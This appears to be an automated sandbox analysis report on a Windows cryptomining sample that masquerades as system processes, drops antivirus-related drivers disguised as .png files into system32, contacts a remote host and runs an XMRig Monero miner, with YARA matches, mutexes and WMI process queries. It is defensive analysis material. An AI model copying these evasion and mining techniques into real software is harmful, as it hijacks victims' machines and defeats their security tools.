Source: expand.exe, 00000003.00000003.1868975905.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000000.1971643275.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015561971.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000002.2138615831.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000000.2167369156.000000000047C000.00000008.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://curl.haxx.se/P
Source: expand.exe, 00000003.00000003.1868975905.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000000.1971643275.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015561971.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000002.2138615831.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000000.2167369156.000000000047C000.00000008.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://curl.haxx.se/docs/copyright.htmlDVarFileInfo$
Source: curl.exe, curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
Source: curl.exe	String found in binary or memory: http://curl.haxx.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://curl.haxx.se/docs/sslcerts.html
Source: curl.exe	String found in binary or memory: http://curl.haxx.se/docs/sslcerts.htmlcurl
Source: 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: http://https://-.://%s%s%s/%sall
Source: smartsscreen.exe	String found in binary or memory: http://hws.exeinvalidjsonrpckav.exekis.exelookup
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://www.avast.com0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://www.avast.com0/
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: smartsscreen.exe	String found in binary or memory: https://%s:%sicssuppnt.exeif-none-matchimage/svg
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 1.1.1.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 1.1.1.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.90.158.40:443 -> 192.168.2.4:49775 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: taskhostw.exe PID: 3616, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Source: C:\Users\user\Desktop\curl.exe

File created: C:\Windows\system32\drivers\aswArPots.png

Jump to behavior

Source: C:\Users\user\Desktop\curl.exe	File created: C:\Windows\system32\drivers\aswArPots.png	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\72f5dad3d3e346df92d05eb16b52df1c$dpx$.tmp\0bfdc61464f46f4e9af5455e9b3ded61.tmp	Jump to behavior
Source: C:\Users\user\Desktop\curl.exe	File created: C:\Windows\system32\drivers\IObitUnlockers.png	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\system32\drivers\bb7302fc42eb479faf23a8d79ab6c5b2$dpx$.tmp\a9588d84e77073409fe455d00c8a6901.tmp	Jump to behavior

Source: C:\Users\user\Desktop\smartsscreen.exe

File deleted: C:\Windows\System32\drivers\aswArPots.png

Jump to behavior

Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00414440	5_2_00414440
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00407670	5_2_00407670
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044D100	5_2_0044D100
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044B3FC	5_2_0044B3FC
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044A444	5_2_0044A444
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00430450	5_2_00430450
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044A59C	5_2_0044A59C
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00450690	5_2_00450690
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0040D870	5_2_0040D870
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00421A00	5_2_00421A00
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00427A80	5_2_00427A80
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0044DAB0	5_2_0044DAB0
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_0041FCC6	5_2_0041FCC6
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00448DA4	5_2_00448DA4
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00431E20	5_2_00431E20
Source: C:\Users\user\Desktop\curl.exe	Code function: 5_2_00418FB0	5_2_00418FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 004447C0 appears 32 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 004107E0 appears 55 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 004074C0 appears 42 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 00410410 appears 39 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 00410730 appears 31 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 00416640 appears 153 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 00426AA0 appears 33 times
Source: C:\Users\user\Desktop\curl.exe	Code function: String function: 004166C0 appears 281 times

Source: 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr

Static PE information: Number of sections : 11 > 10

Source: smartsscreen.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.0.taskhostw.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: taskhostw.exe PID: 3616, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\avgSP
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\AvgVmm
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\%s
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\Harddisk
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: http://\Device\Afd
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: ZwSuspendThread\Device\aswSP
Source: 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	Binary string: \Device\AswVmm

Source: classification engine

Classification label: mal100.evad.mine.winEXE@46/32@0/7

Source: C:\Users\user\Desktop\curl.exe

Code function: 5_2_00413807 GetLastError,GetLastError,_sys_nerr,strrchr,strrchr,GetLastError,SetLastError,FormatMessageA,curl_msnprintf,

5_2_00413807

Source: C:\Users\user\Desktop\smartsscreen.exe

File created: C:\Users\user\Desktop\curl.png

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
Source: C:\Users\user\Desktop\smartsscreen.exe	Mutant created: \Sessions\1\BaseNamedObjects\3h8ScICLR3YGDh2n
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03

Source: smartsscreen.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ExecutablePath, CommandLine, Priority, CreationDate, ProcessID, ThreadCount, Status, ReadOperationCount, ReadTransferCount, WriteOperationCount, WriteTransferCount FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
